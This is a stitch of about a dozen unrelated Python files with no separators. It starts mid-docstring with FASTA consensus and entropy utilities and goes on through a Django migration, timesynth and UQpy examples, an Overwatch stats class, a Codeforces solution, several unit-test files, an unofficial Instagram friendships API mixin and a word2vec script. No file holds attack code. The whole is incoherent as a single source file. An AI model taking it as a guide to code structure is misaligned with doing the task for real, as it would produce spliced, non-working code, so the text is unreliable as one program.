""" aaseq = translate_nuc(nucseq, 0) def plurality_consensus(column, alphabet='ACGT', resolve=False): """ Plurality consensus - nucleotide with highest frequency. In case of tie, report mixtures. """ freqs = {} for char in alphabet: freqs.update({char: 0}) #freqs = {"A": 0, "T": 0, "C": 0, "G": 0, "-": 0} for char in column: if char in alphabet: freqs[char] += 1 elif mixture_dict.has_key(char): # handled ambiguous nucleotides with equal weighting resolutions = mixture_dict[char] for char2 in resolutions: freqs[char2] += 1./len(resolutions) else: # unrecognized nucleotide character pass base = max(freqs, key=lambda n: freqs[n]) max_count = freqs[base] possib = filter(lambda n: freqs[n] == max_count, freqs) if len(possib) == 1: return possib[0] elif "-" in possib: if resolve: possib.remove("-") if len(possib) == 0: return "-" elif len(possib) == 1: return possib[0] else: return ambig_dict["".join(sorted(possib))] else: # gap character overrides ties return "-" else: return ambig_dict["".join(sorted(possib))] def majority_consensus (fasta, threshold = 0.5, alphabet='ACGT', ambig_char = 'N'): """ Return majority-rule consensus sequence. [threshold] = percentage of column that most common character must exceed [alphabet] = recognized character states """ res = '' if len(alphabet) == 0: alphabet = set(fasta[0][1]) columns = transpose_fasta(fasta) for col in columns: cset = set(col) if len(cset) == 1: c = cset.pop() if c not in alphabet: res += ambig_char else: res += c else: counts = [(col.count(c), c) for c in cset if c in alphabet] if len(counts) == 0: res += ambig_char continue counts.sort(reverse=True) # descending order max_count, max_char = counts[0] if max_count / float(len(fasta)) > threshold: res += max_char else: res += ambig_char return res def consensus(fasta, alphabet='ACGT', resolve=False): """ Return plurality consensus of alignment. """ consen = [] columns = transpose_fasta(fasta) for column in columns: consen.append(plurality_consensus(column, alphabet=alphabet, resolve=resolve)) newseq = "".join(consen) """ # Resolve missing data. # Proper indels start and end in-frame. indel_ptn = re.compile("(.{3})*?(?P<indel>(\?{3})+)") indels = [] for match in indel_ptn.finditer(newseq): indels.extend(range(*match.span("indel"))) for column in range(len(consen)): if consen[column] == "?" and column not in indels: consen[column] = consensus(column, resolve=True) return "".join(consen) """ return newseq # ======================================================================= """ transpose_fasta - return an array of alignment columns """ def transpose_fasta (fasta): # some checks to make sure the right kind of object is being sent if type(fasta) is not list: return None if type(fasta[0]) is not list or len(fasta[0]) != 2: return None n_columns = len(fasta[0][1]) res = [] for c in range(n_columns): res.append ( [ s[c] for h, s in fasta ] ) return res def untranspose_fasta(tfasta): nseq = len(tfasta[0]) res = [ '' for s in range(nseq) ] for col in tfasta: for i in range(nseq): res[i] += col[i] return res """ entropy_from_fasta Calculate the mean entropy over columns of an alignment passed as a FASTA object (list of lists). Defaults to the nucleotide alphabet. If a vector of counts is passed, then entropy calculations will be weighted by the frequency of each sequence. Otherwise each sequence will be counted as one instance. NOTE: Non-alphabet characters (e.g., mixtures, gaps) are being simply ignored! 
Test code: infile = open('/Users/apoon/wip/etoi/screened/ACT 60690_NEF_forward.pre2.screen1', 'rU') fasta = convert_fasta(infile.readlines()) infile.close() counts = [int(h.split('_')[1]) for h, s in fasta] """ def entropy_from_fasta (fasta, alphabet = 'ACGT', counts = None): columns = transpose_fasta (fasta) ents = [] for col in columns: ent = 0. # expand character count in vector if 'counts' argument is given if counts: new_col = [] for i in range(len(col)): new_col.extend( [ col[i] for j in range(counts[i]) ] ) col = new_col for char in alphabet: freq = float(col.count(char)) / len(col) if freq > 0: ent -= freq * math.log(freq, 2) ents.append(ent) mean_ent = sum(ents) / len(ents) return mean_ent def bootstrap(fasta, reps=1): """ Random sampling of columns with replacement from alignment. Returns a FASTA (list of lists) """ nsites = len(fasta[0][1]) seqnames = [h for (h, s) in fasta] res = [] # container for FASTAs tfasta = transpose_fasta(fasta) for rep in range(reps): # randomly sample columns sample = [] for j in range(nsites): sample.append(tfasta[random.randint(0, nsites-1)]) # generate new FASTA from sample seqs = untranspose_fasta(sample) boot = [] for k, s in enumerate(seqs): boot.append([seqnames[k], s]) res.append(boot) if reps == 1: return res[0] else: return res
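A brief usage sketch for the utilities above, under the same Python 2 assumptions the module makes: parse a small FASTA block, translate it, and take a plurality/majority consensus. The module filename 'seqUtils.py' is an assumption and the sequences are invented.

# Hedged usage sketch (Python 2, like the module above).
from seqUtils import convert_fasta, translate_nuc, majority_consensus

fasta_text = [
    '>seq1\n', 'ATGGCATTT\n',
    '>seq2\n', 'ATGGCWTTT\n',   # W is an A/T mixture character
]
fasta = convert_fasta(fasta_text)
print(fasta)                                      # [['seq1', 'ATGGCATTT'], ['seq2', 'ATGGCWTTT']]
print(translate_nuc(fasta[0][1], 0))              # 'MAF'
print(majority_consensus(fasta, threshold=0.5))   # ambiguous column falls back to 'N'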
# Generated by Django 3.2.5 on 2021-07-26 11:39 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('kapsoya', '0006_auto_20210725_1629'), ] operations = [ migrations.AlterField( model_name='post', name='category', field=models.CharField(choices=[('1', 'Security'), ('2', 'Health Emergency'), ('3', 'Entertainment'), ('4', 'Fire Breakouts'), ('5', 'Playground'), ('6', 'Death'), ('7', 'Gym')], max_length=120), ), ]
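For context, a hedged sketch of the Post model field this migration targets. Only the 'category' field, its choices and max_length come from the migration above; everything else (module layout, other fields) is an assumption.

# Hypothetical kapsoya/models.py excerpt matching the AlterField above.
from django.db import models

CATEGORY_CHOICES = [
    ('1', 'Security'), ('2', 'Health Emergency'), ('3', 'Entertainment'),
    ('4', 'Fire Breakouts'), ('5', 'Playground'), ('6', 'Death'), ('7', 'Gym'),
]

class Post(models.Model):
    category = models.CharField(choices=CATEGORY_CHOICES, max_length=120)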
import timesynth as ts

# Initializing TimeSampler
time_sampler = ts.TimeSampler(start_time=1642989836, stop_time=1645668236)
# Sampling irregular time samples
irregular_time_samples = time_sampler.sample_irregular_time(num_points=500, keep_percentage=50)
# Initializing Sinusoidal signal
# The waveform of the time series is chosen here
sinusoid = ts.signals.Sinusoidal(frequency=0.25)
# Initializing Gaussian noise
white_noise = ts.noise.GaussianNoise(std=250)
# Initializing TimeSeries class with the signal and noise objects
timeseries = ts.TimeSeries(sinusoid, noise_generator=white_noise)
# Sampling using the irregular time samples
samples, signals, errors = timeseries.sample(irregular_time_samples)
print(samples)
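A small follow-on sketch: visualising the irregular samples produced above with matplotlib. It assumes it is appended to the same script, and that matplotlib is available as an extra dependency.

# Hedged plotting sketch for the samples generated above.
import matplotlib.pyplot as plt

plt.figure(figsize=(8, 3))
plt.plot(irregular_time_samples, samples, marker='.', linestyle='none', label='noisy samples')
plt.plot(irregular_time_samples, signals, linewidth=1, label='underlying sinusoid')
plt.xlabel('time (unix seconds)')
plt.ylabel('value')
plt.legend()
plt.show()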
""" :copyright: (c) 2020 Yotam Rechnitz :license: MIT, see LICENSE for more details """ class Best: def __init__(self, js: dict): try: self._allDamageDoneMostInGame = js["allDamageDoneMostInGame"] except KeyError: self._allDamageDoneMostInGame = 0 try: self._barrierDamageDoneMostInGame = js["barrierDamageDoneMostInGame"] except KeyError: self._barrierDamageDoneMostInGame = 0 try: self._defensiveAssistsMostInGame = js["defensiveAssistsMostInGame"] except KeyError: self._defensiveAssistsMostInGame = 0 try: self._eliminationsMostInGame = js["eliminationsMostInGame"] except KeyError: self._eliminationsMostInGame = 0 try: self._environmentalKillsMostInGame = js["environmentalKillsMostInGame"] except KeyError: self._environmentalKillsMostInGame = 0 try: self._finalBlowsMostInGame = js["finalBlowsMostInGame"] except KeyError: self._finalBlowsMostInGame = 0 try: self._healingDoneMostInGame = js["healingDoneMostInGame"] except KeyError: self._healingDoneMostInGame = 0 try: self._heroDamageDoneMostInGame = js["heroDamageDoneMostInGame"] except KeyError: self._heroDamageDoneMostInGame = 0 try: self._killsStreakBest = js["killsStreakBest"] except KeyError: self._killsStreakBest = 0 try: self._meleeFinalBlowsMostInGame = js["meleeFinalBlowsMostInGame"] except KeyError: self._meleeFinalBlowsMostInGame = 0 try: self._multikillsBest = js["multikillsBest"] except KeyError: self._multikillsBest = 0 try: self._objectiveKillsMostInGame = js["objectiveKillsMostInGame"] except KeyError: self._objectiveKillsMostInGame = 0 try: self._objectiveTimeMostInGame = js["objectiveTimeMostInGame"] except KeyError: self._objectiveTimeMostInGame = 0 try: self._offensiveAssistsMostInGame = js["offensiveAssistsMostInGame"] except KeyError: self._offensiveAssistsMostInGame = 0 try: self._reconAssistsMostInGame = js["reconAssistsMostInGame"] except KeyError: self._reconAssistsMostInGame = 0 try: self._soloKillsMostInGame = js["soloKillsMostInGame"] except KeyError: self._soloKillsMostInGame = 0 try: self._teleporterPadsDestroyedMostInGame = js["teleporterPadsDestroyedMostInGame"] except KeyError: self._teleporterPadsDestroyedMostInGame = 0 try: self._timeSpentOnFireMostInGame = js["timeSpentOnFireMostInGame"] except KeyError: self._timeSpentOnFireMostInGame = 0 try: self._turretsDestroyedMostInGame = js["turretsDestroyedMostInGame"] except KeyError: self._turretsDestroyedMostInGame = 0 @property def allDamageDoneMostInGame(self): return self._allDamageDoneMostInGame @property def barrierDamageDoneMostInGame(self): return self._barrierDamageDoneMostInGame @property def defensiveAssistsMostInGame(self): return self._defensiveAssistsMostInGame @property def eliminationsMostInGame(self): return self._eliminationsMostInGame @property def environmentalKillsMostInGame(self): return self._environmentalKillsMostInGame @property def finalBlowsMostInGame(self): return self._finalBlowsMostInGame @property def healingDoneMostInGame(self): return self._healingDoneMostInGame @property def heroDamageDoneMostInGame(self): return self._heroDamageDoneMostInGame @property def killsStreakBest(self): return self._killsStreakBest @property def meleeFinalBlowsMostInGame(self): return self._meleeFinalBlowsMostInGame @property def multikillsBest(self): return self._multikillsBest @property def objectiveKillsMostInGame(self): return self._objectiveKillsMostInGame @property def objectiveTimeMostInGame(self): return self._objectiveTimeMostInGame @property def offensiveAssistsMostInGame(self): return self._offensiveAssistsMostInGame @property def 
reconAssistsMostInGame(self): return self._reconAssistsMostInGame @property def soloKillsMostInGame(self): return self._soloKillsMostInGame @property def teleporterPadsDestroyedMostInGame(self): return self._teleporterPadsDestroyedMostInGame @property def timeSpentOnFireMostInGame(self): return self._timeSpentOnFireMostInGame @property def turretsDestroyedMostInGame(self): return self._turretsDestroyedMostInGame
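A hedged construction example for the Best wrapper above: feed it a partial stats dictionary (the shape is inferred from the keys __init__ reads) and read a few properties; missing keys fall back to 0.

# Hedged usage sketch; assumes it runs in the same module as the Best class above.
example_js = {
    "eliminationsMostInGame": 34,
    "killsStreakBest": 11,
    # every other key is deliberately omitted to exercise the 0 defaults
}
best = Best(example_js)
print(best.eliminationsMostInGame)   # 34
print(best.killsStreakBest)          # 11
print(best.healingDoneMostInGame)    # 0 (missing key defaults to 0)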
def func01():
    print("func01 executed")

def func02():
    print("func02 executed")

def func03():
    print("func03 executed")

print(__name__)
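A quick companion sketch of what the print(__name__) line above demonstrates: run directly, the module prints "__main__"; imported, it prints its module name. The filename funcs.py used here is an assumption.

# Hedged companion sketch; assumes the module above is saved as funcs.py.
# Running it directly (python funcs.py) makes print(__name__) output "__main__";
# importing it instead outputs the module name:
import funcs        # prints "funcs" at import time

funcs.func01()      # prints "func01 executed"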
""" Oakley Function (1 random input, scalar output) ====================================================================== In this example, PCE is used to generate a surrogate model of a sinusoidal function with a single random input and a scalar output. """ # %% md # # Import necessary libraries. # %% import numpy as np import matplotlib.pyplot as plt from UQpy.distributions import Normal from UQpy.surrogates import * # %% md # # Define the sinusoidal function to be approximated. # # Reference: Oakley, J. E., & O'Hagan, A. (2004). Probabilistic sensitivity analysis of complex models: a Bayesian # approach. Journal of the Royal Statistical Society: Series B (Statistical Methodology), 66(3), 751-769. # %% def oakley_function(x): return 5 + x + np.cos(x) # %% md # # Create a distribution object, generate samples and evaluate the function at the samples. # %% np.random.seed(1) dist = Normal(loc=0, scale=2) n_samples = 100 x = dist.rvs(n_samples) y = oakley_function(x) # %% md # # Create an object from the PCE class, construct a total-degree polynomial basis given a maximum polynomial degree, and # compute the PCE coefficients using least squares regression. # %% max_degree = 8 polynomial_basis = TotalDegreeBasis(dist, max_degree) least_squares = LeastSquareRegression() pce_lstsq = PolynomialChaosExpansion(polynomial_basis=polynomial_basis, regression_method=least_squares) pce_lstsq.fit(x,y) # %% md # # Create an object from the PCE class, construct a total-degree polynomial basis given a maximum polynomial degree, and # compute the PCE coefficients using LASSO regression. # %% polynomial_basis = TotalDegreeBasis(dist, max_degree) lasso = LassoRegression() pce_lasso = PolynomialChaosExpansion(polynomial_basis=polynomial_basis, regression_method=lasso) pce_lasso.fit(x,y) # %% md # # Create an object from the PCE class, construct a total-degree polynomial basis given a maximum polynomial degree, and # compute the PCE coefficients using ridge regression. # %% polynomial_basis = TotalDegreeBasis(dist, max_degree) ridge = RidgeRegression() pce_ridge = PolynomialChaosExpansion(polynomial_basis=polynomial_basis, regression_method=ridge) pce_ridge.fit(x, y) # %% md # # PCE surrogate is used to predict the behavior of the function at new samples. # %% x_test = dist.rvs(100) x_test.sort(axis=0) y_test_lstsq = pce_lstsq.predict(x_test) y_test_lasso = pce_lasso.predict(x_test) y_test_ridge = pce_ridge.predict(x_test) # %% md # # Plot training data, true function and PCE surrogate # %% n_samples_ = 1000 x_ = np.linspace(min(x_test), max(x_test), n_samples_) f = oakley_function(x_) plt.figure() plt.plot(x_test, y_test_lstsq, 'g', label='PCE predictor - LSTSQ') plt.plot(x_test, y_test_lasso, 'r', label='PCE predictor - LASSO') plt.plot(x_test, y_test_ridge, 'b', label='PCE predictor - Ridge') plt.scatter(x, y, label='training data') plt.plot(x_, f, 'm', label='function') plt.title('PCE surrogate - prediction accuracy') plt.legend(); plt.show() # %% md # Error Estimation # ----------------- # Construct a validation dataset and get the validation error. 
# %% # validation sample n_samples = 100000 x_val = dist.rvs(n_samples) y_val = oakley_function(x_val).flatten() # PCE predictions y_pce_lstsq = pce_lstsq.predict(x_val).flatten() y_pce_lasso = pce_lasso.predict(x_val).flatten() y_pce_ridge = pce_ridge.predict(x_val).flatten() # mean absolute errors error_lstsq = np.sum(np.abs(y_val - y_pce_lstsq))/n_samples error_lasso = np.sum(np.abs(y_val - y_pce_lasso))/n_samples error_ridge = np.sum(np.abs(y_val - y_pce_ridge))/n_samples print('Mean absolute error from least squares regression is: ', error_lstsq) print('Mean absolute error from LASSO regression is: ', error_lasso) print('Mean absolute error from ridge regression is: ', error_ridge) print(' ') # mean relative errors error_lstsq = np.sum( np.abs((y_val - y_pce_lstsq)/y_val) )/n_samples error_lasso = np.sum( np.abs((y_val - y_pce_lasso)/y_val) )/n_samples error_ridge = np.sum( np.abs((y_val - y_pce_ridge)/y_val) )/n_samples print('Mean relative error from least squares regression is: ', error_lstsq) print('Mean relative error from LASSO regression is: ', error_lasso) print('Mean relative error from ridge regression is: ', error_ridge) # %% md # Moment Estimation # ----------------- # Returns mean and variance of the PCE surrogate. # %% n_mc = 1000000 x_mc = dist.rvs(n_mc) y_mc = oakley_function(x_mc) mean_mc = np.mean(y_mc) var_mc = np.var(y_mc) print('Moments from least squares regression :', pce_lstsq.get_moments()) print('Moments from LASSO regression :', pce_lasso.get_moments()) print('Moments from Ridge regression :', pce_ridge.get_moments()) print('Moments from Monte Carlo integration: ', mean_mc, var_mc)
#!/usr/bin/env python3 # 664A_gcd.py - Codeforces.com/problemset/problem/664/A by Sergey 2016 import unittest import sys ############################################################################### # Gcd Class (Main Program) ############################################################################### class Gcd: """ Gcd representation """ def __init__(self, test_inputs=None): """ Default constructor """ it = iter(test_inputs.split("\n")) if test_inputs else None def uinput(): return next(it) if it else sys.stdin.readline().rstrip() # Reading single elements [self.a, self.b] = map(int, uinput().split()) def calculate(self): """ Main calcualtion function of the class """ result = 1 if self.a != self.b else self.a return str(result) ############################################################################### # Unit Tests ############################################################################### class unitTests(unittest.TestCase): def test_single_test(self): """ Gcd class testing """ # Constructor test test = "1 2" d = Gcd(test) self.assertEqual(d.a, 1) # Sample test self.assertEqual(Gcd(test).calculate(), "1") # Sample test test = "61803398874989484820458683436563811772030917980576 61803398874989484820458683436563811772030917980576" self.assertEqual(Gcd(test).calculate(), "61803398874989484820458683436563811772030917980576") # Sample test test = "" # self.assertEqual(Gcd(test).calculate(), "0") # My tests test = "" # self.assertEqual(Gcd(test).calculate(), "0") # Time limit test # self.time_limit_test(5000) def time_limit_test(self, nmax): """ Timelimit testing """ import random import timeit # Random inputs test = str(nmax) + " " + str(nmax) + "\n" numnums = [str(i) + " " + str(i+1) for i in range(nmax)] test += "\n".join(numnums) + "\n" nums = [random.randint(1, 10000) for i in range(nmax)] test += " ".join(map(str, nums)) + "\n" # Run the test start = timeit.default_timer() d = Gcd(test) calc = timeit.default_timer() d.calculate() stop = timeit.default_timer() print("\nTimelimit Test: " + "{0:.3f}s (init {1:.3f}s calc {2:.3f}s)". format(stop-start, calc-start, stop-calc)) if __name__ == "__main__": # Avoiding recursion limitaions sys.setrecursionlimit(100000) if sys.argv[-1] == "-ut": unittest.main(argv=[" "]) # Print the result string sys.stdout.write(Gcd().calculate())
# Copyright 2009-2017 Ram Rachum. # This program is distributed under the MIT license. '''Testing module for `nifty_collections.ordered_dict.OrderedDict`.''' from python_toolbox import cute_testing from python_toolbox.nifty_collections.ordered_dict import OrderedDict def test_sort(): '''Test the `OrderedDict.sort` method.''' ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) ordered_dict_copy = ordered_dict.copy() assert ordered_dict == ordered_dict_copy ordered_dict.sort() assert ordered_dict == ordered_dict_copy ordered_dict_copy.sort(key=(lambda x: -x)) assert ordered_dict != ordered_dict_copy assert ordered_dict == dict(ordered_dict) == ordered_dict_copy ordered_dict[4] = ordered_dict_copy[4] = 'd' assert ordered_dict != ordered_dict_copy assert ordered_dict == dict(ordered_dict) == ordered_dict_copy ordered_dict_copy.sort(key=ordered_dict_copy.__getitem__) assert ordered_dict == ordered_dict_copy ordered_dict_copy.sort(key=(lambda x: -x)) assert ordered_dict != ordered_dict_copy assert ordered_dict == dict(ordered_dict) == ordered_dict_copy ordered_dict.sort(key=(lambda x: -x)) assert ordered_dict == ordered_dict_copy second_ordered_dict = OrderedDict(((1+2j, 'b'), (2+3j, 'c'), (3+1j, 'a'))) second_ordered_dict.sort('imag') assert second_ordered_dict == \ OrderedDict(((3+1j, 'a'), (1+2j, 'b'), (2+3j, 'c'))) second_ordered_dict.sort('real', reverse=True) assert second_ordered_dict == \ OrderedDict(((3+1j, 'a'), (2+3j, 'c'), (1+2j, 'b'))) def test_index(): '''Test the `OrderedDict.index` method.''' ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) assert ordered_dict.index(1) == 0 assert ordered_dict.index(3) == 2 assert ordered_dict.index(2) == 1 ordered_dict[2] = 'b' assert ordered_dict.index(1) == 0 assert ordered_dict.index(3) == 2 assert ordered_dict.index(2) == 1 ordered_dict['meow'] = 'frr' assert ordered_dict.index('meow') == 3 with cute_testing.RaiseAssertor(ValueError): ordered_dict.index('Non-existing key') def test_builtin_reversed(): '''Test the `OrderedDict.__reversed__` method.''' ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) assert list(reversed(ordered_dict)) == [3, 2, 1] def test_reversed(): ordered_dict = OrderedDict(((1, 'a'), (2, 'b'), (3, 'c'))) assert ordered_dict.reversed == OrderedDict(((3, 'c'), (2, 'b'), (1, 'a'))) assert type(ordered_dict.reversed) is type(ordered_dict) is OrderedDict
import unittest
import javabridge
from TASSELpy.TASSELbridge import TASSELbridge

try:
    try:
        javabridge.get_env()
    except AttributeError:
        print("AttributeError: start bridge")
        TASSELbridge.start()
except AssertionError:
    print("AssertionError: start bridge")
    TASSELbridge.start()
except:
    raise RuntimeError("Could not start JVM")

from TASSELpy.net.maizegenetics.taxa.TaxaList import *
from TASSELpy.net.maizegenetics.taxa.TaxaListBuilder import TaxaListBuilder
from TASSELpy.java.lang.String import metaString

class TaxaListTest(unittest.TestCase):
    list_builder = TaxaListBuilder()
    list_builder.add(Taxon('first'))
    list_builder.add(Taxon('second'))
    taxa_list = list_builder.build()

    def test___init__(self):
        # Load data
        assert type(self.taxa_list) is TaxaList, "TaxaListBuilder constructor error"
        self.assertIsInstance(self.taxa_list, TaxaList, "__init__ is error")

    def test_numberOfTaxa(self):
        arr = self.taxa_list.numberOfTaxa()
        self.assertIsInstance(arr, metaInteger)
        self.assertEqual(arr, 2)

    def test_taxaName(self):
        arr1 = self.taxa_list.taxaName(0)
        arr2 = self.taxa_list.taxaName(1)
        self.assertIsInstance(arr1, metaString)

if __name__ == '__main__':
    unittest.main(exit=False)
    TASSELbridge.stop()
import warnings from .common import ClientExperimentalWarning from ..compatpatch import ClientCompatPatch from ..utils import raise_if_invalid_rank_token class FriendshipsEndpointsMixin(object): """For endpoints in ``/friendships/``.""" def autocomplete_user_list(self): """User list for autocomplete""" res = self._call_api( 'friendships/autocomplete_user_list/', query={'followinfo': 'True', 'version': '2'}) if self.auto_patch: [ClientCompatPatch.list_user(user, drop_incompat_keys=self.drop_incompat_keys) for user in res['users']] return res def user_following(self, user_id, rank_token, **kwargs): """ Get user followings :param user_id: :param rank_token: Required for paging through a single feed and can be generated with :meth:`generate_uuid`. You should use the same rank_token for paging through a single user following. :param kwargs: - **query**: Search within the user following - **max_id**: For pagination :return: """ raise_if_invalid_rank_token(rank_token) endpoint = 'friendships/{user_id!s}/following/'.format(**{'user_id': user_id}) query_params = { 'rank_token': rank_token, } query_params.update(kwargs) res = self._call_api(endpoint, query=query_params) if self.auto_patch: [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def user_followers(self, user_id, rank_token, **kwargs): """ Get user followers :param user_id: :param rank_token: Required for paging through a single feed and can be generated with :meth:`generate_uuid`. You should use the same rank_token for paging through a single user followers. :param kwargs: - **query**: Search within the user followers - **max_id**: For pagination :return: """ raise_if_invalid_rank_token(rank_token) endpoint = 'friendships/{user_id!s}/followers/'.format(**{'user_id': user_id}) query_params = { 'rank_token': rank_token, } query_params.update(kwargs) res = self._call_api(endpoint, query=query_params) if self.auto_patch: [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def friendships_pending(self): """Get pending follow requests""" res = self._call_api('friendships/pending/') if self.auto_patch and res.get('users'): [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def friendships_show(self, user_id): """ Get friendship status with user id :param user_id: :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": false, "is_private": false } """ endpoint = 'friendships/show/{user_id!s}/'.format(**{'user_id': user_id}) res = self._call_api(endpoint) return res def friendships_show_many(self, user_ids): """ Get friendship status with mulitple user ids :param user_ids: list of user ids :return: .. code-block:: javascript { "status": "ok", "friendship_statuses": { "123456789": { "following": false, "incoming_request": true, "outgoing_request": false, "is_private": false } } } """ if isinstance(user_ids, str): user_ids = [user_ids] params = { '_uuid': self.uuid, '_csrftoken': self.csrftoken, 'user_ids': ','.join(user_ids) } res = self._call_api('friendships/show_many/', params=params, unsigned=True) return res def friendships_create(self, user_id): """ Follow a user :param user_id: User id :return: .. 
code-block:: javascript { "status": "ok", "friendship_status": { "incoming_request": false, "followed_by": false, "outgoing_request": false, "following": true, "blocking": false, "is_private": false } } """ endpoint = 'friendships/create/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def friendships_destroy(self, user_id, **kwargs): """ Unfollow a user :param user_id: User id :param kwargs: :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": false, "is_private": false } """ endpoint = 'friendships/destroy/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def friendships_block(self, user_id): """ Block a user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": true, "is_private": false } """ endpoint = 'friendships/block/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def friendships_unblock(self, user_id): """ Unblock a user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": false, "is_private": false } """ endpoint = 'friendships/unblock/{user_id!s}/'.format(**{'user_id': user_id}) params = {'user_id': user_id} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def block_friend_reel(self, user_id): """ Hide your stories from a specific user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": true, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": true, "is_private": false } """ endpoint = 'friendships/block_friend_reel/{user_id!s}/'.format(**{'user_id': user_id}) params = {'source': 'main_feed'} params.update(self.authenticated_params) res = self._call_api(endpoint, params=params) return res def unblock_friend_reel(self, user_id): """ Unhide your stories from a specific user :param user_id: User id :return: .. code-block:: javascript { "status": "ok", "incoming_request": false, "is_blocking_reel": false, "followed_by": false, "is_muting_reel": false, "outgoing_request": false, "following": false, "blocking": true, "is_private": false } """ endpoint = 'friendships/unblock_friend_reel/{user_id!s}/'.format(**{'user_id': user_id}) res = self._call_api(endpoint, params=self.authenticated_params) return res def set_reel_block_status(self, user_ids, block_status='block'): """ Unhide your stories from a specific user :param user_ids: list of user IDs :param block_status: One of 'block', 'unblock' :return: .. 
code-block:: javascript { "friendship_statuses": { "123456790": { "following": true, "is_private": false, "incoming_request": false, "outgoing_request": false, "is_blocking_reel": true, "is_muting_reel": false }, "123456791": { "following": true, "is_private": false, "incoming_request": false, "outgoing_request": false, "is_blocking_reel": true, "is_muting_reel": false } }, "status": "ok" } """ if block_status not in ['block', 'unblock']: raise ValueError('Invalid block_status: {0!s}'.format(block_status)) if not isinstance(user_ids, list): user_ids = [user_ids] params = {'source': 'settings'} user_block_statuses = {} for user_id in user_ids: user_block_statuses[str(user_id)] = block_status params['user_block_statuses'] = user_block_statuses params.update(self.authenticated_params) return self._call_api('friendships/set_reel_block_status/', params=params) def blocked_reels(self): """ Get list of users from whom you've hid your stories """ warnings.warn('This endpoint is experimental. Do not use.', ClientExperimentalWarning) res = self._call_api('friendships/blocked_reels/', params=self.authenticated_params) if self.auto_patch and res.get('users'): [ClientCompatPatch.list_user(u, drop_incompat_keys=self.drop_incompat_keys) for u in res.get('users', [])] return res def enable_post_notifications(self, user_id): """ Turn on post notifications for specified user. :param user_id: :return: """ res = self._call_api( 'friendships/favorite/{user_id!s}/'.format(**{'user_id': user_id}), params=self.authenticated_params) return res def disable_post_notifications(self, user_id): """ Turn off post notifications for specified user. :param user_id: :return: """ res = self._call_api( 'friendships/unfavorite/{user_id!s}/'.format(**{'user_id': user_id}), params=self.authenticated_params) return res def ignore_user(self, user_id): """ Ignore a user's follow request. :param user_id: :return: """ params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api( 'friendships/ignore/{user_id!s}/'.format(**{'user_id': user_id}), params=params) return res def remove_follower(self, user_id): """ Remove a follower. :param user_id: :return: """ params = {'user_id': user_id, 'radio_type': self.radio_type} params.update(self.authenticated_params) res = self._call_api( 'friendships/remove_follower/{user_id!s}/'.format(**{'user_id': user_id}), params=params) return res
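A hedged pagination sketch for user_followers above. The mixin is meant to be composed into a client class that is not shown in this module, and the 'next_max_id' key used for paging is an assumption about the API response rather than something this module confirms.

# Hedged paging sketch; 'client' is assumed to be an instance of a class that
# mixes in FriendshipsEndpointsMixin and exposes generate_uuid().
def iter_followers(client, user_id):
    rank_token = client.generate_uuid()   # reuse one token for the whole walk
    max_id = None
    while True:
        kwargs = {'max_id': max_id} if max_id else {}
        page = client.user_followers(user_id, rank_token, **kwargs)
        for user in page.get('users', []):
            yield user
        max_id = page.get('next_max_id')   # assumed response key
        if not max_id:
            break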
import os
import pandas as pd
import nltk
import gensim
import scipy
from gensim import corpora, models, similarities

os.chdir("C:/Users/pudutta/Desktop")
df = pd.read_csv('battles.csv')
x = df['name'].values.tolist()
y = df['location'].values.tolist()
corpus = x + y
tok_corp = [nltk.word_tokenize(sent.decode('utf-8')) for sent in corpus]
model = gensim.models.Word2Vec(tok_corp, min_count=1, size=32)
# Save and reload under the same name (the original saved 'testmodel' but loaded 'test_model').
model.save('test_model')
model = gensim.models.Word2Vec.load('test_model')
model.most_similar('Golden')
# model.most_similar([vector])
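A hedged follow-on for the script above: query the trained vectors through model.wv, gensim's keyed-vectors accessor. 'Golden' appears in the script already; the second token 'Winterfell' is an assumption about the contents of battles.csv.

# Hedged follow-on sketch; assumes the same 'model' variable from the script above
# and that both tokens occur in the tokenised corpus.
vector = model.wv['Golden']                              # 32-dimensional vector (size=32 above)
print(vector.shape)
print(model.wv.similarity('Golden', 'Winterfell'))       # cosine similarity of two tokens
print(model.wv.most_similar(positive=['Golden'], topn=5))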
